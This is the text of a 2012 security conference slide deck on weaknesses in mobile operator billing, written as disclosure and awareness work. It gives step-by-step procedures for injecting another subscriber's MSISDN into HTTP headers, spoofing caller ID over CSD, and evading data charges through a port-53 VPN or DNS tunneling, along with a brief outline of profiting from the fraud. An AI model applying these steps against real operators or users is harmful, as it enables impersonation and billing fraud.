Internet Services Mobile networks: exploiting HTTP headers and data traffic Bogdan ALECU
Jan 19, 2015
Internet Services
Mobile networks: exploiting HTTP
headers and data trafficBogdan ALECU
About me
• Independent security researcher
• Sysadmin
• Passionate about security, specially when it’s related to
mobile devices, CISSP, CEH, CISA,CCSP
• Started with NetMonitor (thanks Cosconor), continued
with VoIP and finally GSM networks / mobile phones
• @msecnet / www.m-sec.net
Bogdan Alecu December 2012
THANK YOU!
The End!
Questions?
Bogdan Alecu December 2012
This talk is NOT about
• SQL Injection, Cross-Site Scripting (XSS), Cross-Site
Request Forgery (CSRF) or anything alike
� ANY DEMO THAT WILL BE SHOWN HAS TO BE TREATED
JUST LIKE AN EXAMPLE AND NOTHING MORE
� HAVE NO INTENT TO DISCREDIT ANY OF THE
OPERATORS
� JUST A HEADS UP – RAISE SECURITY AWARENESS
AMONG USERS, PROGRAMMERS, MOBILE OPERATORS
Bogdan Alecu December 2012
Mobile operators have their own WAP / WEB page for
customers:
• Balance check
• Money transfer
• Download music, videos, wallpapers, etc
• Subscribe to services (eg. custom ringback tones)
Usually the page is available only on the mobile phone
Bogdan Alecu December 2012
Bogdan Alecu December 2012
Bogdan Alecu September 2012Bogdan Alecu December 2012
Bogdan Alecu December 2012
HOWEVER@
Bogdan Alecu December 2012
Bogdan Alecu December 2012
User Agent Switcher - https://addons.mozilla.org/en-
US/firefox/addon/user-agent-switcher/
Bogdan Alecu December 2012
User Agent Switcher – impersonate the browser to pretend
that you’re actually browsing from a phone
Description: NokiaE71
User Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-
1/110.07.127; Profile/MIDP-2.0 Configuration/CLDC-1.1 )
AppleWebKit/413 (KHTML, like Gecko) Safari/413
App Code Name: Series 60
App Name: Browser
App Version: Series60/3.1
Platform: E71
Vendor: Nokia
Bogdan Alecu December 2012
User Agent Switcher
� not much to do: just browse the mobile version of the site
� could be used to overpass the mobile-only data traffic plan
� no access to your subscriptions
Some sites provide with application/vnd.wap.xhtml+xml
content
� XHTML Mobile Profile
� https://addons.mozilla.org/en-US/firefox/addon/xhtml-
mobile-profile/
Bogdan Alecu December 2012
How the mobile operators know who should be
charged?
• Once you connect to the Internet, the operator knows your mobile
number
� no attack here; can’t spoof the number
� physical access necessary to another SIM
• They use specific HTTP headers to send the number
� used specially for 3rd party websites
� hard to find those headers
� can be easily attacked / changed
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
Where are the headers coming from?
1. Your phone’s browser
2. Operator’s proxy
Bogdan Alecu December 2012
� Tested around 20 operators from Romania, Germany,
Austria, Italy, France, Poland, United Kingdom, Brazil,
Netherlands
� No user has been affected as for most of the tests I had
my own SIM card
� Some tests could not be fully performed
Bogdan Alecu December 2012
� Discovered in January 2012
� First report in March to an affected mobile operator
� Reported to GSMA in April (later got confirmation
from different operators that GSMA issued a warning)
� Most of the operators responded quickly and also
fixed the vulnerability
� Informed operators and GSMA about this public
disclosure
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
How to find the headers?
1st idea: - connect your phone to computer and sniff the traffic
- find the headers names where phone # is stored
- headers might be specific to each carrier
- find a way to modify the value of the headers
- ATTACK!
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
1st idea: - Result
FAIL!
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
How to find the headers?
2nd idea: - search the web for headers
- headers might be specific to each carrier
- find a way to modify the value of the headers
- ATTACK!
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
How to find the headers?
2nd idea: - search the web for headers
That’s good, but there must be something more!
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
How to find the headers?
2nd idea: - search the web for headers
Found a paper called “Privacy Leaks in Mobile Phone Internet
Access” by Collin Mulliner -
http://www.mulliner.org/collin/academic/publications/mobile_web_privacy_icin10_mulliner.pdf
Bogdan Alecu December 2012
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
Chosen HTTP headers:
o X-UP-CALLING-LINE-ID
o X_FH_MSISDN
o MSISDN
o X-MSISDN
o X-NOKIA-MSISDN
o M
o X_NETWORK_INFO
Bogdan Alecu December 2012
How the mobile operators know who should be
charged? - HTTP headers
- find a way to modify the value of the headers
Modify Headers – Firefox Extension
https://addons.mozilla.org/en-US/firefox/addon/modify-headers/
Bogdan Alecu December 2012
Action: Modify Value: mobile number in E.164 format
Bogdan Alecu December 2012
� We have the headers
� We know how to change them
� We know how to impersonate the browser
The attack:
1. From inside of the mobile operator network
2. From outside of the mobile operator network (2 types)
Bogdan Alecu December 2012
1. From inside of the mobile operator network
Steps:
a) Use a GSM modem and SIM card
b) Configure the profile settings to match those of your
operator
c) Connect to the Internet and change the User Agent to
match a mobile phone browser
d) Inject HTTP headers with the MSISDN of the target
Bogdan Alecu December 2012
1. From inside of the mobile operator network
DEMO
Bogdan Alecu December 2012
1. From inside of the mobile operator network
• “It just works!”
• No need to know any complicated password
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2a) Use your own Internet connection
� Connect to the Internet and change the User Agent to
match a mobile phone browser
� Inject HTTP headers with the MSISDN of the target
Bogdan Alecu December 2012
Things I noticed after these 2 types of attack:
� Attack works either on the operator's website, either
on the 3rd party site or both
� Some operators let you access their mobile site only
if you are connected to their network, while others do
not have such restriction
� Sometimes you need to also set the proxy in order to
set a different MSISDN in the HTTP headers
Bogdan Alecu December 2012
Things I noticed after these 2 types of attack:
� Few have implemented a unique session ID for each
connection instead of the phone number
� Just one operator from the ones I tested was ignoring
any additional headers sent, but there might be others
that do that
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) The old fashioned way ☺☺☺☺
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) The old fashioned way ☺☺☺☺ aka CSD (Circuit Switched Data)
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o Think about it like dial-up
o Since it involves actually placing a phonecall, it is
exposed to the same vulnerabilities like a regular call
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o 1st idea: - search for CSD settings
- see what it can be changed
- test
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o 1st idea:
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o 1st idea:
OOPS! I need to have Data Call enabled
Changing the username to match another number did
not help
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o 2nd idea: - spoof the caller ID
- connect to the Internet
- test
Bogdan Alecu December 2012
2. From outside of the mobile operator network (2 types)
2b) CSD
o 2nd idea: - spoof the caller ID
DEMO
Bogdan Alecu December 2012
To be noted:
� On some operators you still have to send the HTTP
headers
� Sometimes there was a poor way to detect if the call
was coming from their network. Easy to pass it: call
first a number from the network which has call
forwarding setup to the CSD number
� Not all operators have a full CSD number available (eg
*231)
Bogdan Alecu December 2012
How to profit B. and get caught
� Create a LLC (Limited Liability Company)
� Sign a partnership with the operators to provide 3rd
party web content on their portal
� Attack different users or just subscribe them to your
services (yes, you can do that without asking for any
permissions)
� Profit
Bogdan Alecu December 2012
Few recommendations:
� Check if the web page is accessed from your network
(IP)
� Do not rely solely on the Caller ID
� Implement username/password access for sensitive
zones (like modifying active services)
� Send SMS to the customer informing that a purchase
has been made, a service has been modified, etc
� Be careful with the 3rd party content providers
Bogdan Alecu December 2012
Conclusion:
� Sometimes there might be issues in the mobile operator’s system
“Our technology does not allow unauthorized access.
Occurrence of errors in billing regarding data traffic is
excluded.” (Customer Support)
Bogdan Alecu December 2012
Conclusion:
� Depending on the destination, the cost of the attack
might be higher than the revenue
� Mobile operators reacted promptly
� Unfortunately there are still issues – mostly on 3rd
party services
� Check if your operator allows you to disable access
to premium rate content
� Test yourself and report the issue to your operator
Bogdan Alecu December 2012
Data traffic vulnerability (2 types)
o You should be able to access the operator’s webpage
in order to top-up or view account details
B. But we can exploit this
Bogdan Alecu December 2012
Data traffic vulnerability (2 types)
1. Setup a VPN server on port 53, UDP (DNS port)
B and connect to your server
B pass the traffic to the Internet
UNLIMITED & UNCOUNTED
MOBILE DATA TRAFFIC!
Bogdan Alecu December 2012
Data traffic vulnerability (2 types)
2. DNS tunneling
What if:
- You had your own DNS server
- Delegate all DNS requests to your server
- Encapsulate in the reply the traffic
WAIT! THERE IS A WAY!
Bogdan Alecu December 2012
Data traffic vulnerability (2 types)
2. DNS tunneling
a.sub.domain.com. IN NS sub.domain.com.
sub.domain.com. IN A 79.122.100.20 (your IP)
Request: www.google.com.up.a.sub.domain.com
Answer: www.google.com.down.a.sub.domain.com IN
AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6
EsAavqHgBzH2khqsQHQjEf355jS7cT
G+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7Gdn
gGm9jpvReXX7S/2oqAIUFCn0M8=
Bogdan Alecu December 2012
Data traffic vulnerability (2 types)
2. DNS tunneling
- Already built solution: Iodine
http://code.kryo.se/iodine/ (for Linux, Windows, Android)
Bogdan Alecu December 2012
THANK YOU!
Special thanks to:
Tobias Engel
Collin Mulliner
all security guys from mobile operators
Bogdan Alecu December 2012